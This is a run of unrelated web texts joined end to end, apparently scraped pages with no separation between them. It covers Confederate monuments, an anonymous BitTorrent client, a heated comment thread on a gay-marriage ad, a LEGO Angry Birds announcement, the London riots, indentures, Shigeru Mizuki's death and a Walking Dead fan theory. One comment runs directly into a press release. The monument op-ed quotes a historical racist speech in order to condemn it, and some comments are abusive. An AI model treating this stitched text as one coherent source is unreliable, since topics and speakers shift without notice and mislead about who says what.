`` It really changed the way I thought about how to live life at Princeton , to be reminded about what is most important when your health — and life and death — is on the line , realizing how important it is to take care of your physical and mental health and how easy it is to lose all that in just one second , '' she said . `` If I 'm able to get through that , then I 'm fine with anything else . ''
Chow highlights that experience as well as teaching in prisons as her `` go-to pillars for reminding myself that there 's so much more out in the world that needs to be cared about . ''
Looking back on her time at Princeton , Chow said : `` These four years have felt like a fairy tale where I was given the unprecedented chance to immerse myself in intellectual stimulation while engaging in community service . It has given me the hope and inspiration to continue to strike this balance wherever life takes me in the future . ''
The debate over Confederate monuments has been framed by President Donald Trump — and some who share his views — as a fight between those who wish to preserve history and those who would “ erase ” it . But let us linger on what history we 'll be preserving as long as Confederate memorials stand .
The Confederate monuments in New Orleans ; Charlottesville , Virginia ; Durham , North Carolina , and elsewhere did not organically pop up like mushrooms . The installation of the 1,000-plus memorials across the US was the result of the orchestrated efforts of white Southerners and a few Northerners with clear political objectives : They tended to be erected at times when the South was fighting to resist political rights for black citizens . The preservation of these monuments has likewise reflected a clear political agenda .
It is going to take equal energy and focus to remove them from the national landscape .
But the story of the monuments is even stranger than many people realize . Few if any of the monuments went through any of the approval procedures that we now commonly apply to public art . Typically , groups like the United Daughters of the Confederacy ( UDC ) , which claimed to represent local community sentiment ( whether they did or did not ) , funded , erected , and dedicated the monuments . As a consequence , contemporaries , especially African Americans , who objected to the erection of monuments had no realistic opportunity to voice their opposition .
Most Confederate monuments were , in short , the result of private groups colonizing public space .
Over the past decade , Southern legislatures have passed laws requiring approval from state legislatures before any historical monuments can be moved , removed , or altered — thereby freezing those private decisions in place .
A controversy in Reidsville , North Carolina in 2011 , which failed to attract any national attention , offers a window into the origins of Confederate monuments and their contested “ ownership. ” That year , an errant driver plowed into the generic Confederate soldier memorial that stood precariously beside a major street in the small town , 25 miles north of Greensboro .
Because other motorists had previously hit the monument , the UDC , which had funded and erected the monument in 1910 , decided the sculpture would be safer if it was moved to a nearby cemetery . But in a strange twist , the plan was blocked when the Sons of Confederate Veterans , another Confederate heritage organization , sued the UDC to prevent the relocation of the monument . Eventually , the UDC prevailed and the restored monument was rededicated in the cemetery in 2014 . The city itself was a spectator in this legal fight .
Had the dispute flared after 2015 , when the state legislature passed a law effectively blocking the removal of monuments , the UDC would have had to tangle not only with neo-Confederates but also with state legislators .
A smaller number of monuments , like the one recently toppled in Durham , were indeed funded with public money — but an asterisk must be attached to the word “ public. ” In 1922 , Confederate veterans in Durham persuaded the state legislature to allocate $ 5,000 of county taxes to fund the monument . No one asked black residents , who were denied the right to vote by Jim Crow laws , whether they supported spending their tax dollars on this public , political statement .
Most monuments went up not immediately after the war , but as Southerners put Jim Crow in place — and Northerners gave up on racial justice
Let us acknowledge that the architectural landscapes we have inherited are neither sacred nor unchanging . The timing of the proliferation of the monuments themselves illustrates this point . In the years immediately after the Civil War , North Carolina Confederates understandably mourned their dead , yet the state erected fewer than 30 memorials between 1865 and 1890 . Then , during the next half century , they dedicated more than 130 .
It is hardly coincidence that the cluttering of the state 's landscape with Confederate monuments coincided with two major national cultural projects : first , the “ reconciliation ” of the North and the South , and second , the imposition of Jim Crow and white supremacy in the South . As part of the process of national reconciliation , white Northerners agreed to tolerate the commemoration of Confederates , and they contributed both moral support and funds to the veneration of a few Confederate figures in particular , especially Robert E. Lee .
Lee became a convenient icon of reconciliation who was depicted as having reluctantly fought to protect his native state — not slavery— and then after the war devoted himself to the uplift of the South and to binding the nation 's wounds . For white Northerners , Lee was a military hero who could be venerated without having to embrace the Confederate cause in its totality . ( This impulse explains the monuments to Lee in the US Capitol , at the City University of New York , and other sites outside of the former Confederacy . )
Meanwhile , white Southerners used the commemoration of the Confederacy to promote a degree of white cultural unity that had never existed in the region either before or during the Civil War . An observer scanning the commemorative landscape of North Carolina will see little evidence of the tens of thousands of white North Carolinians who fought for the Union , the even larger number of white North Carolinians who actively opposed the Confederacy , or the tens of thousands of African Americans who escaped slavery and joined the Union army .
Confederate commemorators suppressed these unwelcome blemishes to their preferred version of history while simultaneously making the Confederate cause virtually sacred . White Southerners who questioned the Confederate narrative faced ostracism or worse .
Some contemporaries linked the monuments to the defense of white supremacy in shockingly explicit terms
The pursuit of white cultural unity through Confederate commemoration went hand-in-hand with the promotion of white supremacy . The Confederate monuments themselves were sometimes explicitly linked to the cause of white supremacy by the notables who spoke at their dedication . For instance , at the 1913 dedication of an on-campus monument honoring University of North Carolina students who fought for the Confederacy , white industrialist Julian Carr unambiguously urged his audience to devote themselves to the maintenance of white supremacy with the same vigor that their Confederate ancestors had defended slavery .
During the dedication speech , Carr praised Confederate soldiers not just for their wartime valor but also for their defense “ of the Anglo Saxon race during the four years after the war ” when “ their courage and steadfastness saved the very life of the Anglo Saxon race in the South. ” The “ four years after the war ” was a clear reference to the period in which the Ku Klux Klan , a white paramilitary organization terrorized blacks and white Republicans who threatened the traditional white hierarchy in the state . Then he boasted that “ one hundred yards from where we stand ” — and within months of Lee 's 1865 surrender — “ I horse whipped a negro wench until her skirts hung in shreds because she had maligned and insulted a Southern lady . ”
Carr admittedly was uncommonly explicit about conflating Confederate memorialization with white supremacy , but Southern memorials inherently celebrated the slave South and white power along with the heroism of Confederate soldiers .
We topple old buildings , move or rename streets , and engage in creative destruction all the time — which is inevitable when the needs of the people living contemporary landscapes change . The somewhat comical events in Reidsville ( in which the United Daughters of the Confederacy concluded it would be for the best if fewer drivers crashed into their statue ) provide just one example of a decision to move a memorial for a practical reason .
Elsewhere , communities have had other reasons to act . Wilson , North Carolina , for example , has been home since 1926 to a memorial that commemorated the Revolution and the Confederacy : It originally featured a massive central column depicting the Stars and Stripes and the flag of the Confederate States of America , flanked by two water fountains — one for whites , one for blacks . It apparently outlasted its welcome sometime during the 1960s . Without fanfare , the fountain was moved from the court house to an inconspicuous park , and the fountains were replaced by small granite caps . Today you would be unlikely to recognize it as a one-time segregated water fountain .
So how should we move forward to dismantle the Confederate commemorative landscape ? We should begin by acknowledging that the American South is now a pluralist society for the first time in its history . Whereas the current commemorative landscape of the South is a product of white privilege and power , the future landscape should be crafted after inclusive public debate and through democratic procedures . New Orleans and Baltimore , which conducted public conversations about the removal of monuments , can serve as models for other communities . New Orleans Mayor Mitch Landrieu has provided an exceptionally articulate justification for the removal of Confederate memorials .
A crucial step in many Southern states will be to repeal laws constraining the removal or alteration of historic monuments , such as North Carolina 's two-year-old Historic Artifact Management and Patriotism Act . Let there be no doubt about the intent of this or similar “ heritage preservation ” laws : They “ protect ” and perpetuate the racist commemorative landscape that currently exists . Why should n't the citizens of Durham have had the choice to preserve , move , or remove the Confederate monument there ? Local choice may allow some communities to keep “ their ” Confederate monuments . So be it . Let them defend their decision if they do so .
We are also sure to hear calls to add monuments ( honoring African Americans , for example ) as an alternative to removing those we find offensive , and thereby “ erasing ” history . But removing — or moving — Confederate monuments is not historical erasure . The same logic could have been used to justify maintaining , after 1964 , signs that identified “ Negro water fountains , ” “ Colored waiting room , ” and the other markers of Southern segregation .
In an ideal world with unlimited resources , a proposal to add monuments might make sense . But given the vast number of monuments to the Confederacy across the United States it would take decades , and millions of dollars , to add enough statuary to create a more inclusive commemorative landscape . And is there any reason to believe that state legislators are going to appropriate sufficient money for that purpose ? Perhaps the defenders of Confederate monuments will demonstrate their good faith by pressing for funding for new monuments to Southerners , white and black , who fought on behalf of the Union or otherwise opposed the Confederacy . Until then , I will view their devotion to heritage preservation with skepticism .
This is hardly the first time that a society has confronted the issue of dealing with art harnessed to objectionable causes . Art museums are filled with medieval and early modern Western art that is offensive to many of our contemporary values — depicting rape , the slaughter of Muslims , or demeaning images of non-Europeans . Like those works of art , those Confederate monuments that have aesthetic significance can and should be preserved in museums where they can be properly interpreted by curators and docents . In such settings , they will serve as historical artifacts rather than civic monuments .
But many Confederate monuments were essentially “ mail order ” sculptures mass produced by Northern and Southern foundries during the late 19th and early 20th centuries . Whatever value they have as historical artifacts , they were not the work of some latter-day Michelangelo .
Before any Confederate monuments are removed , they should be carefully photographed and measured so that the historical record of the monuments in situ can be preserved and made available for historians and art historians in the future . Then they can be transferred to the archives , museums — or the trash heap of history .
W. Fitzhugh Brundage is the William B. Umstead Professor of History at the University of North Carolina at Chapel Hill . He is the scholarly adviser to the Commemorative Landscapes of North Carolina project .
The Big Idea is Vox 's home for smart discussion of the most important issues and ideas in politics , science , and culture — typically by outside contributors . If you have an idea for a piece , pitch us at thebigidea @ vox.com .
Researchers at Delft University of Technology have released the first public test of their anonymous BitTorrent client . With the new Tribler release users can share files more securely , without exposing their IP-address to the rest of the world .
The Tribler client has been around for more nearly a decade already , and during that time it 's developed into the only truly decentralized BitTorrent client out there .
Even if all torrent sites were shut down today , Tribler users would still be able to find and add new content .
But the researchers want more . One of the key problems with BitTorrent is the lack of anonymity . Without a VPN or proxy all downloads can easily be traced back to an individual internet connection .
The Tribler team hopes to fix this problem with a built-in Tor network , routing all data through a series of peers . In essence , Tribler users then become their own Tor network helping each other to hide their IP-addresses through encrypted proxies .
“ The Tribler anonymity feature aims to make strong encryption and authentication the Internet default , ” Tribler leader Dr. Pouwelse tells TF .
For now the researchers have settled for three proxies between the senders of the data and the recipient . This minimizes the risk of being monitored by a rogue peer and significantly improves privacy .
“ Adding three layers of proxies gives you more privacy . Three layers of protection make it difficult to trace you . Proxies no longer need to be fully trusted . A single bad proxy can not see exactly what is going on , ” the Tribler team explains .
“ The first proxy layer encrypts the data for you and each next proxy adds another layer of encryption . You are the only one who can decrypt these three layers correctly . Tribler uses three proxy layers to make sure bad proxies that are spying on people can do little damage . ”
Tribler 's encrypted Tor routing
Today Tribler opens up its technology to the public for the first time . The Tor network is fully functional but for now it is limited to a 50 MB test file . This will allow the developers to make some improvements before the final release goes out next month .
There has been an increased interest in encryption technologies lately . The Tribler team invites interested developers to help them improve their work , which is available on Github .
“ We hope all developers will unite inside a single project to defeat the forces that have destroyed the Internet essence . We really do n't need a hundred more single-person projects on ‘ secure ' chat applications that still fully expose who you talk to , ” Pouwelse says .
For users the Tor like security means an increase in bandwidth usage . After all , they themselves also become proxies who have to pass on the transfers of other users . According to the researchers this should n't result in any slowdowns though , as long as people are willing to share .
“ Tribler has always been for social and sharing people . Like private tracker communities with plenty of bandwidth to go around we think we can offer anonymity without slow downs , if we can incentivize people to leave their computers on overnight and donate , ” Pouwelse says .
“ People who share will have superior anonymous speeds , ” he adds .
Those interested in testing Tribler 's anonymity feature can download the latest version . Bandwidth statistics are also available . Please bear in mind that only the test file can be transferred securely at the moment .
READER COMMENTS ON
`` VIDEO : Anti-Marriage Bigots Launch Deceptive New Fear-Mongering 'Storm Gathering ' Hate Ad ''
( 48 Responses so far ... )
COMMENT # 1 [ Permalink ]
... CharlieL said on 4/8/2009 @ 4:55 pm PT ...
Here 's the link to The Courage Campaign . Stop the Haters .
COMMENT # 2 [ Permalink ]
... Dr Andrew Power said on 4/8/2009 @ 6:16 pm PT ...
If only they 'd spend their money on helping people instead of pushing this down others ' throats .
COMMENT # 3 [ Permalink ]
... Mitch Trachtenberg said on 4/8/2009 @ 6:33 pm PT ...
Hmmm , `` I 'm a California doctor who must choose between her faith and her job . '' It boggles the mind how gay marriage can possibly force such a choice on this doctor . Does she insist on throwing gay spouses out of the waiting room ? `` I 'm part of a New Jersey church group punished by the government because we ca n't support gay marriage . '' Um , the only `` punishment '' I can think of might be that they risk their tax exemption by illegally using their funds in support of political campaigns . I 'm punished that way every time I pay taxes . `` I 'm a Massachusetts parent helplessly watching ... while schools teach my son that gay marriage is OK. '' Ah , here we begin to get to the heart of the matter . If gay marriage is legal , how will bigot moms be able to spout bigotry about gay people without their children thinking `` gee , Mom 's sure a bigot . '' I 'll bet that poor woman has already watched helplessly while schools have taught that black-people-sitting-at-the-front-of-the-bus is `` OK. '' Life can sometimes be insufferable .
COMMENT # 4 [ Permalink ]
... Bamboo Harvester said on 4/8/2009 @ 8:01 pm PT ...
Wilburrr ... ~ Sounds more like `` The Cowards Campaign '' if ya ask me . . .
~
COMMENT # 5 [ Permalink ]
... Emily said on 4/8/2009 @ 10:27 pm PT ...
This video response gives some info about the specific situations alluded to in the 'storm ' piece . ( Bamboo , the Courage Campaign is organizing AGAINST the people who made the Storm ad . )
COMMENT # 6 [ Permalink ]
... Floridiot said on 4/9/2009 @ 5:51 am PT ...
Way down in Texas , they want the Chinese to simplify their names so it will make it easier to disenfranchise them on the id bill Link They are too stoopid to have any shame .
COMMENT # 7 [ Permalink ]
... john said on 4/9/2009 @ 5:59 am PT ...
What a bunch of idiots who thought they are the smartest in the world . When they lost the election , that 's a voting fraud . When they can not prove it , they conduct so-called research based on their own imagination . Still can not make it , simply go to the street slandering people who are not on their side . Nothing but a bunch of stupid liberal losers .
COMMENT # 8 [ Permalink ]
... Floridiot said on 4/9/2009 @ 6:32 am PT ...
No , the `` idiots '' are the ones that Ms. Pelosi talks about here
COMMENT # 9 [ Permalink ]
... Bamboo Harvester said on 4/9/2009 @ 7:00 am PT ...
Oops ...
COMMENT # 10 [ Permalink ]
... Disillusioned said on 4/9/2009 @ 9:00 am PT ...
`` a rainbow coalition of people of every creed and color are coming together ... '' Wow , the irony of that statement in the context they put it . Its too bad stupidity is n't painful .
COMMENT # 11 [ Permalink ]
... bard said on 4/9/2009 @ 10:11 am PT ...
This is really a disgusting ad - though not surprising in the least . It appeals to the lowest common denominator . However , I do n't think it plays beyond its typical audience - the ignorant and intolerant - who always imagine that their holy way of life is being threatened . I 'm not sure why they are so concerned . After all , as long as they maintain their sin-free lives , they will be going to heaven while the sinners who are outlined in this ad will be frying in hell for eternity . So , no worries .
COMMENT # 12 [ Permalink ]
... oldtree said on 4/9/2009 @ 11:22 am PT ...
How do these organizations gain from this ? Oh yea , collect money from suckers and keep it . Make a couple tv commercials and put em ' on basic cable . Nice swindle for the GOP . Soon they will have taken it all from their contributors and will turn to rust .
COMMENT # 13 [ Permalink ]
... Bluebear2 said on 4/9/2009 @ 1:39 pm PT ...
Disillusioned # 10 I picked up on that too ! Bozos
COMMENT # 14 [ Permalink ]
... Paul McCarthy said on 4/9/2009 @ 2:29 pm PT ...
With all the buildup , the commercial turned out to be very dull and robot-like , with these people just reading lines as if they had been brainwashed . It is nowhere near as clever as the commercial where the Mormon missionaries search the gay couple 's home for a marriage license .
COMMENT # 15 [ Permalink ]
... Ancient said on 4/9/2009 @ 3:23 pm PT ...
Oh shit , I 'm just sooo OT lately ...
In honor of Passover : http : //en.wikipedia.org/wiki/Golda_Meir Now girls , ca n't WE do better ?
Grow love , do n't just merely exist ! Ever been out on the OCEAN ? You get buffeted . I spent 15 years doing that when girls were not all that welcome .
COMMENT # 16 [ Permalink ]
... the zapkitty said on 4/9/2009 @ 3:25 pm PT ...
And now the last word . Warning ... scarily talentless hypocrites at work : http : //thinkprogress.org ... thering-storm-auditions/ ... the video of the auditions for the `` real people '' in that commercial was on the NOM website ...
COMMENT # 17 [ Permalink ]
... Ancient said on 4/9/2009 @ 3:29 pm PT ...
And somebody asks Herrington how that project to teach people to feed themselves is going ?
COMMENT # 18 [ Permalink ]
... Ancient said on 4/9/2009 @ 3:35 pm PT ...
COMMENT # 19 [ Permalink ]
... Ancient said on 4/9/2009 @ 4:00 pm PT ...
Hey , did I just create property rights there ? If I did , most of it goes to you Brad . We got to fund this somehow .
COMMENT # 20 [ Permalink ]
... Gos said on 4/9/2009 @ 4:09 pm PT ...
Man , i really hate when Republicans use wedge issues to distract us from what 's really going on in the world . Yep , hate those Republicans for using distractions to keep us focused on issues of sex and race rather than what really matters . Thank God I 'm not an `` anti-marriage bigot '' that responds to `` hate '' adds like this . Damn those FRIGGIN ' MONGREL RETHUGLICAN NAZI 'S THEY 'RE JUST SCARED BECAUSE THEY 'RE GAY THEMSELVES THE STUPID IDIOTS THIS COUNTRY WOULD BE ALOT BETTER IF WE COULD JUST GET RID OF THE WHOLE LOT OF THEM ! ! ! Anyone else gets ever get the feeling that the whole gay rights movement is allowed to happen because alot of wealthy and influential people have relatives that are gay ? It sure is a great wedge issue that ultimately has no effect on how the money is divvied up . I wonder what the statistics would be on heterosexuality and income/education level . I 'd be willing to bet that homosexuality goes up with income and education level . One more area where the wealthy and educated have more opportunties than the poor and ignorant .
COMMENT # 21 [ Permalink ]
... Ancient said on 4/9/2009 @ 4:16 pm PT ...
Hey , here 's another one for yinz , is it morally correct to make a profit off the least of my brothers ?
COMMENT # 22 [ Permalink ]
... Ancient said on 4/9/2009 @ 4:19 pm PT ...
Sorry , that damn song is stuck in my head ...
You Do Unto Me .
COMMENT # 23 [ Permalink ]
... Agent 99 said on 4/9/2009 @ 4:34 pm PT ...
Gos I hate it when people fall for it ....
COMMENT # 24 [ Permalink ]
... Ancient said on 4/9/2009 @ 5:52 pm PT ...
Yo 99 , just living what I was taught . I 'm sensitive to all comments in a row !
COMMENT # 25 [ Permalink ]
... Ancient said on 4/9/2009 @ 6:44 pm PT ...
An oh yeah 99 , I picked up my come down town tea bag flyers ( not in a million years ) in my local smoke shop ... yeah , I smoke cigaretts . Does Brad still smoke ? An on another note , if arlene or Haggis joins with the triumvirate vote ... I just might vote for him again .
COMMENT # 26 [ Permalink ]
... Ancient said on 4/9/2009 @ 7:37 pm PT ...
You know that includes islam ... along with judaism and christianity .
COMMENT # 27 [ Permalink ]
... Agent 99 said on 4/9/2009 @ 7:59 pm PT ...
Ancient , dear , I 'm sorry but I almost never have the first part of a clue what you are talking about .... You seem to have a talent for obliquity .
COMMENT # 28 [ Permalink ]
... Ancient said on 4/9/2009 @ 8:01 pm PT ...
How bout them red states ... intellectually deprived ... no child left behind . Oh yeah , I bagged out on teaching cuz , our children are not being served .
COMMENT # 29 [ Permalink ]
... Ancient said on 4/9/2009 @ 8:26 pm PT ...
Oh yeah 99 , my above comment includes all children from ALL OVER in our country . God bless this melting pot .
COMMENT # 30 [ Permalink ]
... Big Dan said on 4/9/2009 @ 9:59 pm PT ...
Do n't you love these `` vague sentences '' , meaningless : 1 . They want to bring the issue into my life . ( what does that mean ? ) 2 . They want to change the way I live ( how ? ) 3 . My freedom will be taken away ( what freedom ? the freedom to tell other people whether they can marry or not ? ) 4 . I will have no choice ( what does that mean ? ) 5 . The storm is coming ( what does that mean ? ) This is crazy , they are nuts ! The entire commercial makes no sense . I guess the Republicans want to ( again ) tell other people what they can and ca n't do . They 're the party of small government , right ?
COMMENT # 31 [ Permalink ]
... Big Dan said on 4/9/2009 @ 10:00 pm PT ...
How many people in that commercial do you think are gay ? Just wonderin ' ... sorry ...
COMMENT # 32 [ Permalink ]
... Big Dan said on 4/9/2009 @ 10:01 pm PT ...
`` Hi , I 'm senator Larry Craig , they 're a dark shitcloud overhead ... ''
COMMENT # 33 [ Permalink ]
... Agent 99 said on 4/9/2009 @ 10:07 pm PT ...
Danny : 1 . They are going to make me marry a homosexual .
2 . They are going to make me marry a homosexual .
3 . They are going to make me marry a homosexual .
4 . They are going to make me marry a homosexual .
5 . They are going to make me marry a homosexual . It just is n't fair .
COMMENT # 34 [ Permalink ]
... Ancient said on 4/9/2009 @ 11:20 pm PT ...
Yeah BD , like they all got little tiny spitballs hanging off the end of their noses or sumpin , to be back on topic .
COMMENT # 35 [ Permalink ]
... the zapkitty said on 4/10/2009 @ 12:01 am PT ...
... Agent 99 said ... `` 1 . They are going to make me marry a homosexual . '' No . It 's worse . The latent fear they 're playing on is much more basic ... `` They 're going to make me and mine homosexual ! '' And it 's an effective tactic if not countered directly and immediately with the facts .
COMMENT # 36 [ Permalink ]
... Floridiot said on 4/10/2009 @ 8:22 am PT ...
They ai n't gon na make me gay , not with Da Crusher as my role model .
COMMENT # 37 [ Permalink ]
... Agent 99 said on 4/10/2009 @ 12:59 pm PT ...
I 'm still speechless with relief this does n't mean I have to marry a homosexual . Da Crusher 's biceps may be the entire cause of homosexuality you know . Maybe we should investigate .
COMMENT # 38 [ Permalink ]
... Floridiot said on 4/10/2009 @ 3:50 pm PT ...
Not biceps , them are his `` a hundred megatons '' do n't cha know .
COMMENT # 39 [ Permalink ]
... the zapkitty said on 4/10/2009 @ 5:51 pm PT ...
... Agent 99 said ... `` I 'm still speechless with relief this does n't mean I have to marry a homosexual . '' No no no ... you misunderstand . First they 'll make you homosexual and then they 'll make you marry a homosexual ... or three
COMMENT # 40 [ Permalink ]
... Agent 99 said on 4/10/2009 @ 6:18 pm PT ...
I double-dog dare anyone to try turning me into a homo ! Da Crusher will look like Cinderella to them right away ... and that will only be from the force of my glare ... if the temporal waves from my laughter do n't knock them over first ....
COMMENT # 41 [ Permalink ]
... FreedomOfInformationAct said on 4/10/2009 @ 8:22 pm PT ...
`` It 's gon na happen whether you like it or not . '' Neocons better get used to being disappointed , or it 's going to be a long two-term Obama presidency .
COMMENT # 42 [ Permalink ]
... Agent 99 said on 4/10/2009 @ 8:46 pm PT ...
... for more than just the neocons I 'm afraid . The first nearly three months do n't bode well for America . Here 's a starter list over a month old , and he 's added to it considerably since then .
COMMENT # 43 [ Permalink ]
... Colin said on 4/14/2009 @ 1:45 pm PT ...
did they they really call their big answer to the gathering storm a `` rainbow coalition '' ?
how ridiculously ironic .
COMMENT # 44 [ Permalink ]
... FreedomOfInformationAct said on 4/16/2009 @ 11:40 am PT ...
Another repercussion of the Prop H8 passage ... enjoy it pubs , `` it 's supposed to taste like a sh ! t sandwich '' ROTFLMAO NY state governor introduces gay marriage bill
Reuters - ‎45 minutes ago‎
By Edith Honan NEW YORK ( Reuters ) - New York Gov . David Paterson on Thursday introduced a bill to allow gay marriage in the state , likening the effort to civil rights struggles and brushing aside objections from religious leaders .
New York governor to push same-sex marriage bill CNN
Gov . Paterson introduces legislation to legalize gay marriage in ... New York Daily News
Newsday - NECN - WNYC - The Associated Press
all 1,130 news articles »
http : //news.google.com/n ... amp ; cf=all & scoring=n
COMMENT # 45 [ Permalink ]
... FreedomOfInformationAct said on 4/16/2009 @ 4:58 pm PT ...
Best Parody of NOM 's `` Gathering Storm '' Ad http : //www.dailykos.com/ ... 4/15/720610/-Open-Thread watch it , it 's a riot !
COMMENT # 46 [ Permalink ]
... Change My Mind said on 5/25/2009 @ 8:38 am PT ...
Of course hate mongers always make the rest of us look more normal ... See ! there is a bright side to every mishap - Anders
COMMENT # 47 [ Permalink ]
... Kaz - Change My Mind said on 6/7/2009 @ 9:52 am PT ...
Lol danny , I 'm sure they wont turn you into a homosexual . That said , what is wrong with that ? I have many homosexual friends who are fantastic people . Unfortunately , none of them are the type to hunt these bigots down .. that 's what friends like me are for
COMMENT # 48 [ Permalink ]
... Hypnosis said on 6/13/2009 @ 8:53 pm PT ...
Rovio has announced that they will be joining forces with The LEGO Group to produce official LEGO Angry Birds sets coming in 2016 in conjunction with the upcoming movie . The Angry Birds license was previously held by K'NEX but LEGO will now soon be acquiring this particular license . Check out the full press release below .
Rovio teams with The LEGO Group to create a collection of building sets related to its 2016 film
LAS VEGAS , Nevada– 8th June 2015– Rovio , makers of Angry Birds , the most downloaded mobile game ever , today announced a partnership with The LEGO Group to develop a line of construction toys . LEGO® Angry Birds will be available in spring 2016 to coincide with the release of The Angry Birds Movie , a full-length feature film based on the popular gaming franchise .
“ The LEGO brand has an unparalleled ability to connect with people through products that spark creativity and imagination . We 're really excited to build experiences together with this amazing best-in-class partner , ” said Pekka Rantala , Chief Executive Officer of Rovio .
“ We are excited to bring Angry Birds to life in LEGO form , given the popularity of the game and its characters with fans of all ages , which will only be amplified by the forthcoming film , ” said Jill Wilfert , Vice President , licensing & entertainment at The LEGO Group . “ We seek partnership with globally relevant properties that offer a unique and rewarding play experience to our fans , and our designers are having fun developing building sets that leverage the engaging play and deconstruction found in the Angry Birds game . ”
Further details about the collection , available in spring of 2016 , are not yet available .
If anyone thought the riots were the work of boroughless scumbags working themselves across London like a rats ' invasion of the Monopoly board – wrong . Tonight I saw people I know who live here in Bow laugh and egg each other on as they took turns to dart under a wrenched open shutter into a designer clothes shop on the Roman Road called Zee & Co – and emerge , scarves around their faces , arms full of booty .
One by one – black , white , Bengali , boy , girl , most of them teenagers – they went in and out as mates laughed and cheered across the street . I followed one lad , a black boy with a barely grown striped beard in a yellow polo shirt , thinking he 'd walk to a van waiting somewhere nearby .
No , nonchalantly , at about 9pm he strolled about 50ft up the road and turned left into a flat above a furniture shop . There was a Turkish bloke wearing a red cap at the door smirking as he let him in . The black boy went upstairs , dumped his loot and joined friends cheering from a first floor window . More followed him in .
These thieves live here . And so do the people watching them . Do they give a toss about the area , one where a year today the eyes of the world will be watching ? No , of course not . This was their fun-filled Looting Olympics .
I watched all this in Tower Hamlets for about an hour . In that time one police van drove past . It slowed down , put on its blue lights and then sped off . What could they do ? This was just one shop ; along Bethnal Green Road , riot police had been deployed .
On the way back I heard these comments , one on the road where I live :
“ I hear Zee 's having an open sale , ” and , “ I got me a load of Stoney hats , bro ” [ he meant Stone Island designer hats ] .
I saw one man emerge from the shop and run into this blue car and drive away :
A bit further along , in the market section of the Roman , I saw this :
The car had been overturned by outside the local Muslim Community Centre . One of the elders there said a gang of black , white and Bengali youths had done it . He said they had been after the parking permit displayed on its windscreen .
Repeat : this is less than a kilometre from the Olympic Stadium .
Mindless does n't begin to describe it – but what else does ?
Advertisements
Half of an indenture document of 1723 showing the randomly cut edge at the top
An indenture is a legal contract that reflects or covers a debt or purchase obligation . It specifically refers to two types of practices : in historical usage , an indentured servant status , and in modern usage , it is an instrument used for commercial debt or real estate transaction .
Historical usage [ edit ]
An indenture is a legal contract between two parties , particularly for indentured labour or a term of apprenticeship but also for certain land transactions . The term comes from the medieval English `` indenture of retainer '' [ 1 ] — a legal contract written in duplicate on the same sheet , with the copies separated by cutting along a jagged ( toothed , hence the term `` indenture '' ) line so that the teeth of the two parts could later be refitted to confirm authenticity ( Chirograph ) . [ 2 ] Each party to the deed would then retain a part . When the agreement was made before a court of law a tripartite indenture was made , with the third piece kept at the court . The term is used for any kind of deed executed by more than one party , in contrast to a deed poll which is made by one individual . In the case of bonds , the indenture shows the pledge , promises , representations and covenants of the issuing party .
Charter of the Clerecía de Ledesma , 1252
Although other evidence indicates that the method has been in use from around the year 1000 , the earliest surviving examples in England are from the thirteenth century . These are agreements for military service , proving that a paid contract army was then in existence . [ 1 ] Exchequer records of Henry V 's French campaign of 1415 ( the Agincourt campaign ) , including the indentures of all the captains of the army agreeing to provide specified numbers of men and at what cost , may still be read . [ 3 ] An indenture was commonly used as a form of sealed contract or agreement for land and buildings . An example of such a use can be found in the National Archives , where an indenture , from about 1401 , recording the transfer of the manor of Pinley , Warwickshire , is held . [ 4 ]
In the early history of the United States , many European immigrants served a period of indentured labour in order to pay the cost of their transportation . This practice was common during the 17th and 18th centuries , where over half of immigrants worked off an average of three years ' servitude .
Modern usage [ edit ]
Bond indenture ( also trust indenture or deed of trust ) is a legal document issued to lenders and describes key terms such as the interest rate , maturity date , convertibility , pledge , promises , representations , covenants , and other terms of the bond offering . When the offering memorandum is prepared in advance of marketing a bond , the indenture will typically be summarised in the `` description of notes '' section .
In the United States , public debt offerings in excess of $ 10 million require the use of an indenture of trust under the Trust Indenture Act of 1939 . The rationale for this is that it is necessary to establish a collective action mechanism under which creditors can collect in a fair , orderly manner if default takes place ( like that which occurs during bankruptcy ) . [ 5 ] No trust relationship exists between the bondholder and the issuing corporation . These two are in a regular contractual , arm 's length , non-fiduciary , non-equity relationship . Rather , the trustee in a `` trust indenture '' is a third party , usually a specialist company , who is appointed by the issuer to handle and safeguard the interests of the numerous public bondholders , in events ranging from the usual distribution of coupons and principal payments to dealing with the issuer 's default , if any occurs .
See also [ edit ]
Cartoonist Shigeru Mizuki , known for his “ GeGeGe no Kitaro ” series depicting yokai , the spirits and monsters of Japanese folklore , died Monday of multiple organ failure at a Tokyo hospital , his office said . He was 93 .
Mizuki , whose real name was Shigeru Mura , was hospitalized Nov. 11 after he fell and hit his head at his Tokyo home . He underwent emergency surgery and temporarily recovered at one point , but died at 7:18 a.m. Monday , according to the office .
The native of Tottori Prefecture started his career as a cartoonist after barely surviving World War II , during which he was sent to Rabaul — a scene of fierce fighting — in what is now Papua New Guinea . He suffered from malaria and lost his left arm in a U.S. airstrike .
Mizuki is also known for works that depict the horror of war , such as “ Soin Gyokusai Seyo ! ” ( “ Onward Towards Our Noble Deaths ” ) , a 1973 manga based on his battlefield experiences .
The extensive piece won high acclaim internationally and in 2009 it received the Heritage Essential Award of the Angouleme International Comics Festival in France .
Witnessing the death of his fellow soldiers , together with his own experience of drifting between life and death during the war , also gave Mizuki inspiration to draw yokai monsters in works such as “ GeGeGe no Kitaro , ” in which the main character strives to achieve peace between the human and spirit worlds .
Reflecting the popularity of his work , which transcends generations , “ GeGeGe no Kitaro ” was repeatedly adapted into TV animation series as well as live-action films .
A museum dedicated to Mizuki opened in Sakaiminato , Tottori Prefecture , in 2003 , becoming a major tourist attraction alongside the “ Mizuki Shigeru Road , ” which displays more than 100 statues of his characters , including Kitaro and a mouselike man named Nezumi Otoko .
A television drama series in 2010 about the life of Mizuki and his wife , Nunoe Mura , was also popular .
The Walking Dead has been on long enough that you can rest assured the fan community has written enough fanfiction to fill a small ( or medium sized , or possibly large ) library , and some of that fiction definitely includes some fan end-game theories . Maybe the best fan theory so far , though , came from Walking Dead actor Michael Rooker , who gave his series end idea to fans at a convention . It 's simple , succinct , compelling , and includes a ~twist~ that we almost wish he had n't come up with so it could 've been the real ending .
When asked about how he envisioned the series ending , Michael Rooker , aka Merle Dixon , said :
`` A railroad track ... going on forever , into the setting sun . From behind camera , a single individual walks down the middle of the tracks ... into the setting sun . Voiceover . You realize that that individual is Carl ... all grown-up , a man of his own . No one else is with him — just him . And as he does his voiceover , you realize that everything , all the seasons that you 've just seen is him reliving his past . So everyone on the show is dead . He 's the only survivor , and he 's on his own and walks off into the sunset . And that 's the end of the show . ''
